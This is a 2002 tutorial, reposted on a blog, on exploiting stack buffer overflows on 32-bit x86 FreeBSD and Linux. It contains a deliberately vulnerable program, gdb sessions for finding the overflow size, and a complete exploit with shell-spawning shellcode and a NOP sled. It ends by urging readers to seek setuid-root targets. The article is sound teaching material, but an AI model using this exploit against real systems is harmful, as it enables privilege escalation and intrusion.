Thursday, February 28, 2008

--=Buffer Overflows by drunkk=--
~~~~~~~~~~~~~~~~~~~~~~~~~~~~

0x1. INTRODUCTION

Site: http://www.sig-hup.net/
E-Mail: drunkk@sig-hup.net
IRC: Undernet -> #gcc
Date: January 10, 2002

This article explains buffer overflows. I didn't go into detail except in
the most important parts. The code was tested on FreeBSD 4.3-REL and on
Linux RedHat 7.0, but it should work on other systems too.
Note that the shellcode is not the same on FreeBSD as it is on Linux.
Let's get started, since I'm tired of stupid introductions.

Chapters:
- introduction
- understanding how the stack works
- short theory about buffer overflows
- executing arbitrary code and the shellcode
- finding the buffer size
- offsets
- generating the buffer
- the end

0x2. UNDERSTANDING HOW THE STACK WORKS

To understand what a buffer overflow is and how it works, you must first
understand how memory is organized for each process and each function
call. Each process has a text segment, a data segment and a stack
segment. We are going to concentrate on the stack. Elements are pushed
onto and popped off the stack in this order: the last object pushed in is
the first one popped out. That is why it is called a LIFO (last in, first
out) stack.
The stack is divided into frames. Each function call has its own frame,
which holds its local (automatic) variables and the data needed to get
back to the caller's frame. This keeps the data of each function call
separate from the others.
The data needed to return to the calling function are the following:
- the saved Instruction Pointer (IP, also called the return address). It
  holds the address of the instruction right after the call, so the
  function knows where to continue in the caller.
- the saved Frame Pointer or Base Pointer (EBP). It holds the address
  where the caller's frame begins.
One more register refers to the stack: the Stack Pointer (SP, %esp on
x86). It contains the memory address of the last object pushed onto the
stack (the top of the stack).
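The LIFO rule can be sketched in plain C. This is a minimal, hypothetical illustration. The names int_stack, push() and pop() are made up for the example, and the capacity of 16 is arbitrary. Unlike the machine stack, this array-based stack grows toward higher indices. It also refuses to push past its capacity instead of overflowing.

```c
#include <stddef.h>

#define STACK_CAP 16   /* arbitrary capacity chosen for the sketch */

struct int_stack {
    int items[STACK_CAP];
    size_t top;        /* number of items; items[top - 1] is the top */
};

/* Pushes v on top; returns -1 instead of writing past the array. */
int push(struct int_stack *s, int v) {
    if (s->top == STACK_CAP) return -1;
    s->items[s->top++] = v;
    return 0;
}

/* Pops the most recently pushed value into *out; returns -1 if empty. */
int pop(struct int_stack *s, int *out) {
    if (s->top == 0) return -1;
    *out = s->items[--s->top];
    return 0;
}
```

If you push 1, 2, 3 and then pop three times, you get 3, 2, 1 back: last in, first out.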

example.c:

void function(int a, int b, int c) {
    char buffer1[5];
    char buffer2[20];
}

int main(void) {
    function(1, 2, 3);
    // The saved Instruction Pointer (return address) points here
    return 0;
}

The arguments of a function are pushed onto the stack in reverse order.
In this example that is c, then b, then a. The stack would look like this
(lower memory addresses on the left, so the top of the stack is on the
left):

[ buffer2 ][ buffer1 ][ BP ][ IP ][ a ][ b ][ c ]

BP - Base Pointer (Frame Pointer)
IP - Instruction Pointer (Return address)
buffer1, buffer2 - local variables of function(), allocated on the
stack.

When function() finishes, it releases its local variables from the stack
(in this case buffer1 and buffer2). Remember, the saved base pointer on
the stack is not the current frame pointer. It holds the value the frame
pointer had in the previous (calling) frame. It is popped back into %ebp,
and from then on we are working with the caller's frame again. Then the
saved instruction pointer (IP) is popped, and execution returns to the
instruction at that address (see the comment in the code).
If you compile the code with gcc using the -S switch (gcc -S -o
example.asm example.c), you will get the assembly code for example.c.
Look at the first lines. The current EBP is pushed onto the stack to save
it. Then the current stack pointer becomes the new frame pointer, that
is, the beginning of our new frame.

push %ebp           # save the caller's base pointer

mov  %esp, %ebp     # the stack pointer becomes the
                    # current base pointer

sub  $0x20, %esp    # move the stack pointer down by 0x20 to
                    # allocate space for buffer1 and buffer2...

...you are probably wondering why it allocates 32 bytes (0x20 in hex is
32) when buffer1 and buffer2 together take only 25 bytes. Memory is
organized in words (1 word = 4 bytes = 32 bits), so the 5-byte buffer1
actually takes 8 bytes in memory. The 20-byte buffer2 is already a
multiple of 4 and takes 20 bytes, for a total of 28 bytes. The remaining
4 bytes are most likely padding the compiler adds to keep the stack
aligned (the exact amount depends on the gcc version and its options).
That gives 32 = 0x20 bytes.
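The rounding arithmetic above can be checked with a small helper. This sketch assumes 4-byte words. For the last step it also assumes 16-byte stack alignment, which is an assumption about gcc's default and not something this article measured. round_up() is a hypothetical name, and it only works when the alignment is a power of two.

```c
#include <stddef.h>

/* Rounds n up to the next multiple of align (align must be a power of two). */
size_t round_up(size_t n, size_t align) {
    return (n + align - 1) & ~(align - 1);
}
```

round_up(5, 4) is 8 and round_up(20, 4) is 20. round_up(8 + 20, 16) is 32, i.e. 0x20.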

0x3. SHORT THEORY ABOUT BUFFER OVERFLOWS

I'll keep this short; I hope it is clear.
Take a look at the picture of the stack above. Notice that buffer1 takes
8 bytes and sits right next to the saved %ebp and the saved %eip (the
return address). Now suppose we use strcpy() to copy a string into
buffer1. As a careful coder, you know the string must fit in the 5 bytes
declared (4 characters plus the terminating NUL). Anything written past
those 5 bytes is already an overflow. Up to 8 bytes, though, it only
lands in padding and does no visible harm. Many functions do bounds
checking for operations like buffer moves and copies. strcpy(), strcat(),
gets(), sprintf() and others don't. So if we write more than 8 bytes into
buffer1, we overwrite the saved base pointer and maybe the saved
instruction pointer. A buffer overflow does not necessarily overwrite
%ebp and %eip. But you'll see in the next section what insecure code like
this can lead to (to the attacker's benefit, of course).
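For contrast, here is what a bounds-checked copy looks like. This is a sketch, not a standard function; copy_bounded() is a hypothetical name. The key difference from strcpy() is that the caller passes the destination size, so nothing is ever written past the end of dst.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical bounded replacement for strcpy(). It copies src into dst only
 * if it fits (including the terminating NUL) and returns 0. If src is too
 * long, dst gets a truncated, NUL-terminated copy and -1 is returned. */
int copy_bounded(char *dst, size_t dstsize, const char *src) {
    size_t len = strlen(src);

    if (len < dstsize) {
        memcpy(dst, src, len + 1);       /* fits: copy the string and its NUL */
        return 0;
    }
    if (dstsize > 0) {
        memcpy(dst, src, dstsize - 1);   /* copy only what fits... */
        dst[dstsize - 1] = '\0';         /* ...and always terminate */
    }
    return -1;
}
```

Suppose buffer1 is declared as char buffer1[5]. Then copy_bounded(buffer1, sizeof buffer1, "abcdefgh") returns -1 and leaves "abcd" in buffer1. The saved %ebp is never touched.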

example2.c:

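#include <string.h>

int main(void) {
    char buffer[12], big[16];
    int i;
    for (i = 0; i < 15; i++) big[i] = 'A';  /* 15 'A's... */
    big[15] = '\0';                          /* ...plus the NUL strcpy() needs */
    strcpy(buffer, big);                     /* copies 16 bytes into 12 */
    return 0;
}

You can see above that big is 4 bytes bigger than buffer. We fill big
with 15 A's plus the terminating NUL, then copy it over (into) buffer.
The initial stack before anything happens looks like this (not to
scale):

[ big ][ buffer ][ BP ][ IP ]....

Now big is filled with A's and copied over buffer, overwriting the saved
base pointer. Here 1 character = 1 byte, and \0 stands for the single
terminating NUL byte:

[AAAAAAAAAAAAAAA\0][AAAAAAAAAAAA][AAA\0][ IP ]....

As you can see, our for() loop fills big with 'A's. strcpy() does no
bounds checking, so it copies all 16 bytes into the 12-byte buffer and
overwrites the saved EBP. (This assumes the compiler places buffer right
below the saved EBP, with no padding in between.)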

0x4. EXECUTING ARBITRARY CODE AND THE SHELLCODE

The Instruction Pointer points to an instruction in memory, as we saw in
section 0x2. I assume you know C, so I won't give programming lessons
here. I will only mention one thing. On the 32-bit x86 systems used here,
a pointer takes up 4 bytes in memory, because a memory address is 4 bytes
long (for example 0xbfbfcd0a). Suppose we could overwrite the saved
Instruction Pointer with another memory address, one that points to
arbitrary code we wish to execute. Then we could exploit the vulnerable
program. So let's get started.
First, a very short note on shellcode, in case you don't know what it is.
Let's say we want to redirect the Instruction Pointer to code that will
spawn us a shell. How do we get that code into memory? By writing it as
shellcode: a short piece of machine code that we place inside the buffer
we overflow. I won't go into detail on how to design it, since you can
find ready-made shellcode anywhere. But you should at least understand
how it works and why it is used.
This is the code we wish to execute:

example3.c:

#include <unistd.h>

int main(void) {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    return 0;
}

This code spawns a shell. To turn it into shellcode, first compile the
program with -static. That links the code of library functions such as
execve() into the binary, so it doesn't depend on shared libraries. Then
look at its assembly representation, either with -S or by disassembling
it in gdb. I assume you know some assembly. Now rewrite that code so it
is "general". It must use only relative distances and no absolute
addresses, so that it works wherever it is loaded in memory (this is the
part I am skipping).
After you write the final asm code, wrap it in C with a simple main()
function like this:

int main(void) {
    __asm__(
        "# your asm code goes here, one quoted string per line\n\t"
    );
    return 0;
}

...then compile it and debug it again with gdb. Type "disassemble main"
to see the machine instructions your asm code was assembled into :). We
need this code to be executed in memory, so that the vulnerable program
spawns us a shell. If you designed the code correctly, you will notice
that it modifies itself. So we can't put it into the text segment, which
is read-only. We can only put it into the data segment, which can be
modified while the program is running. That means we need to represent
our asm code as hex bytes.
Each instruction line begins with a memory address followed by <main+x>,
where x is the distance in bytes from the beginning of main(). You can
use the x/FMT ADDRESS command in gdb to view memory in the format you
want. Here we want the code in hex, one byte at a time, so use
x/bx main+x. Replace x with the offset of the first instruction after
the function prologue, skipping the push of %ebp and the mov that sets
up the new frame pointer. It should probably be <main+3> (push %ebp is 1
byte and mov %esp,%ebp is 2 bytes), as long as you don't have any NOPs
before the code. Now you get the hex value of the first byte of the code
we need. Keep pressing Enter until you get to the last byte. Then write
the shellcode into a char shellcode[] array and save the file, so that
you won't lose it.
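Turning the bytes you read with x/bx into a char shellcode[] initializer is mechanical. Here is a minimal sketch of a hypothetical helper, to_c_escapes(), that formats a byte array as C \x escape sequences. The output buffer must hold 4 characters per byte plus the terminating NUL.

```c
#include <stddef.h>
#include <stdio.h>

/* Writes bytes[0..n) into out as C escapes ("\xeb\x37..."). out must have
 * room for 4 * n + 1 chars. Returns the number of chars written (no NUL). */
size_t to_c_escapes(const unsigned char *bytes, size_t n, char *out) {
    size_t i;

    for (i = 0; i < n; i++)
        sprintf(out + 4 * i, "\\x%02x", bytes[i]);   /* backslash, 'x', 2 hex digits */
    out[4 * n] = '\0';                               /* also covers n == 0 */
    return 4 * n;
}
```

For the bytes 0xeb 0x37 0x5e it produces \xeb\x37\x5e. That is how the first bytes of the shellcode string in xpl.c, later in this article, are written.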
Now we have the shellcode inside a variable. The idea of this buffer
overflow is to fill the buffer (buffer1 in the first example, for
instance) like this: [ shellcode &shellcode &shellcode .... ]. Are you
getting the idea? The shellcode sits at the beginning of the buffer.
After it, all the way through the overflow, we keep writing the memory
address of the beginning of the buffer, where our shellcode is located.
Then the function finishes (whether it is main() or another function
doesn't matter). It pops everything that is no longer needed, including
the saved Instruction Pointer, which now holds the memory address of our
buffer. So that code is executed and spawns a shell, because IP contains
the memory address &shellcode = &buffer. Remember, any location in a
frame can be read or written at any time using its distance from the
base pointer. Only push and pop work LIFO style. You will see a lot more
examples in the next sections, so don't get scared if you don't
understand everything yet.

0x5. FINDING THE BUFFER SIZE

Now let's suppose the code below is the code we want to exploit:

vuln.c:

#include <stdio.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char st[512];
    if (!(argc > 1)) { printf("Not enough parameters.\n"); return 0; }
    strcpy(st, argv[1]);   /* no bounds check: argv[1] can be any length */
    return 0;
}

This code takes the first command-line argument and copies it into st, a
512-byte buffer. All we need to do is pass a buffer that contains the
shellcode and overflows st, so that our code (the shellcode) gets
executed. How to do this is what I'll explain in this section.
This is what happens when we run the compiled vuln.c:

# gcc -o vuln vuln.c
# ./vuln abcdefghik
# ./vuln `perl -e 'printf "A"x600'`
Segmentation fault (core dumped)
#

As you can see, the first time we pass "abcdefghik" as argv[1] (and thus
into st[512]), nothing happens. But when we pass 600 "A"s into st[512]
through argv[1], we get a "Segmentation fault". That means we redirected
the IP somewhere it isn't supposed to point, namely the address
0x41414141. 0x41 is the hex value of the ASCII code of 'A'. It was
written into all four bytes of the return address, resulting in
0x41414141.
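You can see why the address came out as 0x41414141 by reading four 'A' bytes back as a 32-bit word. Here is a small sketch, with word_from_bytes() as a hypothetical helper. Since all four bytes are the same, the result does not depend on byte order.

```c
#include <stdint.h>
#include <string.h>

/* Reads four bytes from memory as one 32-bit value, the way the CPU reads
 * the saved return address when the function returns. */
uint32_t word_from_bytes(const unsigned char *p) {
    uint32_t w;
    memcpy(&w, p, sizeof w);   /* memcpy avoids alignment and aliasing problems */
    return w;
}
```

The same reasoning explains the 0x69696969 and 0x68686868 values in the gdb sessions below.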
Now let's debug the program so that you can see for yourself:

# gdb vuln
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
(gdb) run `perl -e 'printf "A"x600'`
Starting program: /sig-hup/code/b0f/vuln `perl -e 'printf "A"x600'`
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) info registers
eax 0xbfbff79c -1077938276
ecx 0xbfbff9f4 -1077937676
edx 0xbfbffd37 -1077936841
ebx 0x2 2
esp 0xbfbff9a4 0xbfbff9a4
ebp 0x41414141 0x41414141
esi 0xbfbff9f0 -1077937680
edi 0xbfbff9fc -1077937668
eip 0x41414141 0x41414141
eflags 0x10282 66178
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb)

In the example above, we run ./vuln again inside gdb to see what went
wrong. With "info registers" (or "i r") we see the contents of the
registers at the moment the segmentation fault happened. Notice that the
base pointer (ebp) was overwritten with 0x41's, and so was the
instruction pointer (eip). Now we want to put exactly four chosen bytes
into %eip. They form the address that points back to the beginning of
our buffer, where the code we wish to execute is located. To do this, we
must first find out how big our overflow buffer needs to be. We will use
the following code to find out:

getsize.c:

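#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define DEFAULT_SIZE 100

int main(int argc, char *argv[]) {
    int bsize, i;
    char *buff;

    bsize = DEFAULT_SIZE;

    if (argc > 1) bsize = atoi(argv[1]);
    if (bsize < 8) { printf("buffer size too small.\n"); return 1; }
    /* one extra byte for the terminating NUL */
    if (!(buff = malloc(bsize + 1))) { printf("malloc() err.\n"); return 1; }

    for (i = 0; i < bsize; i++) buff[i] = 0x69;          /* fill with 'i' */
    for (i = bsize - 4; i < bsize; i++) buff[i] = 0x68;  /* last 4 bytes: 'h' */
    buff[bsize] = '\0';

    memcpy(buff, "EGG=", 4);   /* turns the buffer into "EGG=iii...hhhh" */
    putenv(buff);              /* buff must stay allocated after putenv() */

    system("/bin/sh");         /* the new shell inherits EGG */
    return 0;
}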

Above, we give ./getsize a buffer size to test as its argument. If no
argument is given, it uses the default buffer size, DEFAULT_SIZE, which
is 100 bytes. Then we fill the buffer with 0x69 (sex number :)), which
is 'i', and fill the last four bytes with 0x68, which is 'h'. We want a
buffer size that makes the program segfault with 0x69's everywhere up to
and including %ebp, and 0x68 in all four bytes of %eip. To make this
easier, I used putenv() to export the test buffer into an environment
variable called EGG. The program then spawns a shell, so we can use the
variable and not lose it. Now let's try to guess the correct size:

# gcc -o getsize getsize.c
getsize.c: In function `main':
getsize.c:11: warning: assignment makes pointer from integer without a cast
# ./getsize 600
# ./vuln $EGG
Segmentation fault (core dumped)
# gdb vuln
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
(gdb) run $EGG
Starting program: /sig-hup/code/b0f/vuln $EGG
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x69696969 in ?? ()
(gdb) i r
eax 0xbfbff540 -1077938880
ecx 0xbfbff790 -1077938288
edx 0xbfbffad7 -1077937449
ebx 0x2 2
esp 0xbfbff748 0xbfbff748
ebp 0x69696969 0x69696969
esi 0xbfbff794 -1077938284
edi 0xbfbff7a0 -1077938272
eip 0x69696969 0x69696969
eflags 0x10282 66178
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb) q
The program is running. Exit anyway? (y or n) y
# exit
#

The buffer size of 600 bytes that we used seems to be too big because
it overwrites %eip with 0x69, which is the 'i', and we need only 0x68
inside %eip, and 0x69 inside %ebp. So let's try a smaller size, like, uhm,
520?

# ./getsize 520
# ./vuln $EGG
Segmentation fault - core dumped
# gdb vuln
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
(gdb) run $EGG
Starting program: /sig-hup/code/b0f/vuln $EGG
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x8040068 in ?? ()
(gdb) i r
eax 0xbfbff5e0 -1077938720
ecx 0xbfbff7e0 -1077938208
edx 0xbfbffb27 -1077937369
ebx 0x2 2
esp 0xbfbff7e8 0xbfbff7e8
ebp 0x68686868 0x68686868
esi 0xbfbff834 -1077938124
edi 0xbfbff840 -1077938112
eip 0x8040068 0x8040068
eflags 0x10286 66182
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb) q
The program is running. Exit anyway? (y or n) y
# exit
#

Woah! The end of the buffer, the 0x68686868 (four 'h's), is now inside
%ebp, and %eip is no longer full of 0x69's (it holds 0x8040068). So what
we obviously need to do is make the buffer 4 bytes longer, so that all
four 0x68's land inside %eip. The final buffer size is then 524. Let's
see if this works:

# ./getsize 524
# ./vuln $EGG
Segmentation fault - core dumped
# gdb vuln
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for
details.
This GDB was configured as "i386-unknown-freebsd"...
(no debugging symbols found)...
(gdb) run $EGG
Starting program: /sig-hup/code/b0f/vuln $EGG
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x68686868 in ?? ()
(gdb) i r
eax 0xbfbff5d8 -1077938728
ecx 0xbfbff7e0 -1077938208
edx 0xbfbffb27 -1077937369
ebx 0x2 2
esp 0xbfbff7e0 0xbfbff7e0
ebp 0x69696969 0x69696969
esi 0xbfbff82c -1077938132
edi 0xbfbff838 -1077938120
eip 0x68686868 0x68686868
eflags 0x10282 66178
cs 0x1f 31
ss 0x2f 47
ds 0x2f 47
es 0x2f 47
fs 0x2f 47
gs 0x2f 47
(gdb) q
The program is running. Exit anyway? (y or n) y
# exit
#

Bingo! We got 0x69's all the way up to exactly where the saved IP is,
and 0x68's in it. So now we know the size our overflow buffer needs. It
might take longer to find the correct size for other vulnerable
programs. But trust me, without a method like this it would be a lot
more "pain".

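The size we found by trial and error can also be explained with a bit of arithmetic. This sketch assumes three things the gdb sessions suggest, none of them guaranteed: there is no padding between st[512] and the saved %ebp, the saved registers are 4 bytes each, and the 4 bytes of "EGG=" are not part of $EGG's value. The constant and function names are hypothetical.

```c
#include <stddef.h>

/* Assumed layout, read off the gdb sessions above (not guaranteed in general). */
enum {
    ST_SIZE    = 512,  /* char st[512] in vuln.c */
    SAVED_EBP  = 4,    /* saved frame pointer */
    SAVED_EIP  = 4,    /* saved return address */
    EGG_PREFIX = 4     /* "EGG=" is in the buffer but not in $EGG */
};

/* Bytes of $EGG that strcpy() copies into st (excluding the NUL). */
size_t egg_payload_len(size_t bsize) {
    return bsize - EGG_PREFIX;
}

/* getsize argument that makes the payload end exactly on the saved %eip. */
size_t size_to_reach_eip(void) {
    return EGG_PREFIX + ST_SIZE + SAVED_EBP + SAVED_EIP;
}
```

With 520 the payload is 516 bytes, so its last four 'h's end on the saved %ebp, which is what the second gdb session shows. With 524 they land on the saved %eip.
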
0x6. OFFSETS

So now we have our next problem, and the last one (phew): finding the
right offset. On these systems the stack starts at the same memory
address for every process. (That is the stack itself, not the frame
pointer; the frame pointer differs for each frame.) The bottom of the
stack is at a high memory address; the gdb output above shows stack
addresses around 0xbfbff000. The stack grows toward lower memory
addresses, so our stack pointer is always a smaller value than the stack
bottom. Stick with this.
For the exploit program we are going to do the same as in getsize.c:
generate the buffer, export it into an environment variable, then
execute a shell so we can pass our variable to the vulnerable program.
We start the exploit program, and inside the spawned shell we start the
vulnerable program. ./vuln is a new process, but its stack starts at the
same address, so it occupies roughly the same region the exploit's stack
did. What we need to guess is the memory address where our buffer will
be located inside st[512] (remember?). That is the value we will put
into %eip. To make this easier, we'll use a function that returns the
current stack pointer (the SP while we are inside the exploit program)
and subtract a value from it, called the offset. The result is the
approximate address of st[512], and with it, of our buffer, in memory.
This short function returns the stack pointer on Linux and FreeBSD x86
systems (other systems need different code):

unsigned long get_esp() {
__asm__("movl %esp, %eax");
}

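On x86, a function's integer return value is passed back in the EAX
register. So here we put the stack pointer (ESP) into EAX, and the
function returns it to us. The function has no return statement, so
this relies on gcc leaving EAX alone afterwards. It works with the old
compilers used here, but C does not guarantee it. Easy so far, right?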
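If you want to avoid relying on the value left in EAX, a common approximation is the address of a local variable. It lives in the current frame, close to the stack pointer. The minimal sketch below uses that idea to check the claim that the stack grows toward lower addresses. The names callee_is_below() and stack_grows_down() are hypothetical. __attribute__((noinline)) is a gcc/clang extension, used here so that the callee really gets its own frame.

```c
#include <stdint.h>

/* The address of a local variable lies inside the current frame, close to
 * the stack pointer, so it can stand in for get_esp() without inline asm. */
__attribute__((noinline))
static int callee_is_below(const volatile char *caller_local) {
    volatile char callee_local = 0;   /* lives in the callee's (newer) frame */
    return (uintptr_t)&callee_local < (uintptr_t)caller_local;
}

/* Returns 1 if a called function's frame sits at a lower address than its
 * caller's, i.e. the stack grows toward lower addresses (as on x86). */
int stack_grows_down(void) {
    volatile char caller_local = 0;
    return callee_is_below(&caller_local);
}
```

On x86, stack_grows_down() returns 1. That matches the picture above, where each new frame sits below the previous one.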

0x7. GENERATING THE BUFFER

Now let's write the exploit. I'll explain this in as much detail as I
can, and it won't be hard to understand if you know pointers and their
usage well. This is the exploit code. It takes two parameters: the
buffer size we already know, and an offset that we need to guess. I used
the FreeBSD shellcode and csh because I tested this under FreeBSD, but
you can change that:

xpl.c:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

char freebsd[] =
"\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89\x36\x89\x76"
"\x04\x89\x76\x08\x83\x06\x10\x83\x46\x04\x18\x83\x46\x08\x1b"
"\x89\x46\x0c\x88\x46\x17\x88\x46\x1a\x88\x46\x1d\x50\x56\xff"
"\x36\xb0\x3b\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff"
"\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02"
"\x02\x02\x02/bin/sh.-c.sh";

#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 524
#define NOP 0x90

unsigned long get_esp() {
__asm__("mov %esp,%eax");
}

int main(int argc, char *argv[]) {
long *ret_addr, addr, offset;
char *nop_addr, *buff, *ptr;
unsigned int bsize, i;

bsize = DEFAULT_BUFFER_SIZE;
offset = DEFAULT_OFFSET;

if (argc>1) bsize = atoi(argv[1]);
if (argc>2) offset = atoi(argv[2]);

addr = get_esp() - offset;

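/* one extra byte for the terminating NUL */
if (!(buff=malloc(bsize + 1))) {
printf("Not enough memory to allocate for buffer.\n");
exit(1);
}

ret_addr = (long *)buff;

/* fill the whole buffer with the guessed address */
for (i = 0; i + sizeof(long) <= bsize; i += sizeof(long)) *(ret_addr++) = addr;
/* fill the first half with NOPs */
for (i = 0; i < bsize/2; i++) buff[i] = NOP;
/* put the shellcode in the middle */
ptr = buff + ((bsize/2)-(strlen(freebsd)/2));
for (i = 0; i < strlen(freebsd); i++) *(ptr++) = freebsd[i];
buff[bsize] = '\0';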
memcpy(buff, "BUF=", 4);
putenv(buff);

printf("Trying:\n\naddr: 0x%lx\nbsize: %u bytes\n\n", (unsigned long)addr, bsize);

system("/bin/csh");
}

Now I am going to explain this (almost) step by step. Start with
"addr = get_esp() - offset". It calculates a memory address by
subtracting the given offset from the current stack pointer. This is the
address we will use to try to exploit the program and spawn our shell.
The buffer we use is a char *, made of 1-byte elements, but we need to
write 4 bytes at a time, because that's how long a memory address is
(remember %eip being 0x68686868?). So we use another pointer, ret_addr,
and make it point to our char buffer by casting it to long *. In the
first for() loop, we keep storing addr (the buffer address we are
assuming to be correct) through ret_addr into buff, increasing ret_addr
by one each time. Notice that ret_addr points to long, which is 4 bytes
on 32-bit x86. Increasing it by 1 doesn't move it 1 byte further; it
moves it one "unit" further, which is 4 bytes in this case.
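The "one unit" rule of pointer arithmetic is easy to check. This small sketch uses uint32_t rather than long, because long is 8 bytes on 64-bit systems, while the exploit relies on the 4-byte step of 32-bit x86. The function names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>

/* Bytes a uint32_t pointer moves when incremented by one. */
ptrdiff_t step_u32(void) {
    uint32_t words[2] = {0, 0};
    uint32_t *p = words;
    p++;                                   /* advances sizeof(uint32_t) bytes */
    return (char *)p - (char *)words;
}

/* Bytes a char pointer moves when incremented by one. */
ptrdiff_t step_char(void) {
    char bytes[2] = {0, 0};
    char *p = bytes;
    p++;                                   /* advances 1 byte */
    return p - bytes;
}
```

step_u32() returns 4 and step_char() returns 1, which is why ret_addr++ moves through buff one address at a time.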

So our buffer is now filled with this address. Next we insert the
shellcode, plus one trick to make the address easier to "guess": we put
the NOP instruction (0x90) into the first half of the buffer.
NOP means "No OPeration". It tells the processor to do nothing and
simply move on to the next instruction, and it is usually used for
padding and timing. We put NOPs into the first half of our buffer
because it could take forever to guess the exact offset, and with it the
exact memory address of the shellcode. With the NOPs, we don't have to
guess the offset exactly. It is enough for the overwritten Instruction
Pointer to point anywhere among those NOPs. The processor then executes
them one byte at a time, moving up through memory toward our shellcode
in the middle of the buffer. Running through the NOPs takes hardly any
time. When execution reaches the shellcode, it runs, and we get a
spawned shell. Now let's test our code and see what happens:

localhost# gcc -o xpl xpl.c
localhost# ./xpl
Trying:

addr: 0xbfbffbdc
bsize: 524 bytes

localhost# ./vuln $BUF
# exit
localhost# exit
exit
localhost#

Heheh, we didn't even need a different offset, and the exploit worked.
As you can see, the exploit exports the BUF environment variable, which
contains our generated buffer. We run ./vuln with $BUF as its argument,
and it spawns us the shell.
I hope I didn't confuse you with all those exits :).
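The buffer layout xpl.c builds can be summarized with a little arithmetic. This sketch assumes the layout described above: NOPs in the first half, the shellcode centered on bsize/2, guessed addresses in the rest, and "BUF=" written over the first 4 bytes. The struct and function names are hypothetical.

```c
#include <stddef.h>

struct buf_layout {
    size_t nop_start;   /* first NOP byte (right after "BUF=") */
    size_t code_start;  /* first shellcode byte = end of the NOPs */
    size_t code_end;    /* one past the last shellcode byte */
    size_t addr_end;    /* end of the guessed-address area (= bsize) */
};

/* Computes the regions of the exploit buffer for a given size and
 * shellcode length, using the same centering formula as xpl.c. */
struct buf_layout layout_for(size_t bsize, size_t code_len) {
    struct buf_layout l;
    l.nop_start  = 4;                          /* "BUF=" overwrites bytes 0..3 */
    l.code_start = bsize / 2 - code_len / 2;   /* shellcode centered on bsize/2 */
    l.code_end   = l.code_start + code_len;
    l.addr_end   = bsize;                      /* guessed addresses fill the rest */
    return l;
}
```

Take bsize = 524 and a 91-byte shellcode (the length of freebsd[], counted by hand). The NOPs occupy bytes 4 to 216, the shellcode 217 to 307, and the guessed addresses the rest. So the guessed address only has to land somewhere in those 213 NOP bytes.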

0x8. THE END

I was running these programs as root, so you may have missed an
important point. You are probably used to getting root when an exploit
is used. Well, not here! This one doesn't give you root by itself. You
must exploit a program that runs as uid 0 (setuid root) but can be run
by a normal shell user. When it spawns the shell, that shell runs as
root. Try finding these kinds of programs in the operating system's
sources, etc. Mail me with questions or for info at drunkk@sig-hup.net,
or ask me on IRC.
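The difference that matters here is between the real and the effective user ID. A setuid-root program runs with effective UID 0 even when a normal user starts it, and whatever it executes inherits that. Here is a minimal sketch that prints both IDs. report_ids() is a hypothetical name; getuid() and geteuid() are standard POSIX calls.

```c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Prints the real and effective user IDs of this process and returns 1
 * if the effective UID is root (0). */
int report_ids(void) {
    uid_t ruid = getuid();    /* who started the program */
    uid_t euid = geteuid();   /* whose privileges it runs with */

    printf("real uid: %ld, effective uid: %ld\n", (long)ruid, (long)euid);
    return euid == 0;
}
```

Run as a normal user, both IDs are your own. If the same program were owned by root and had the setuid bit set (chmod u+s), the effective UID would be 0.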

Thanks to the following people that made this happen:

bored - i wonder if i'll ever catch you being bored
trappie - you started this shit (you know what i mean)
RLoxley - you gave me the idea for this article
maloman - can't wait to get together, smoke some bud
Bruno - read this again ;)
humstrux - man, do you need help finding your way, are you lost? :/
xum - ;)
c0balt - word up!
Pericool - keep up the php werk and the webdesign
#hackphreak - word up for everyone there
#gcc - a very Big thank you for all that support me there

This article can be found on these sites:

1) http://www.sig-hup.net/
2) http://www.hackphreak.org/
3) http://atronica.darktech.org/

Recommended for more documentation:

1) http://code.box.sk/
2) http://www.hackphreak.org/
3) http://www.hert.org/
4) http://www.phrack.org/

/* EOF */

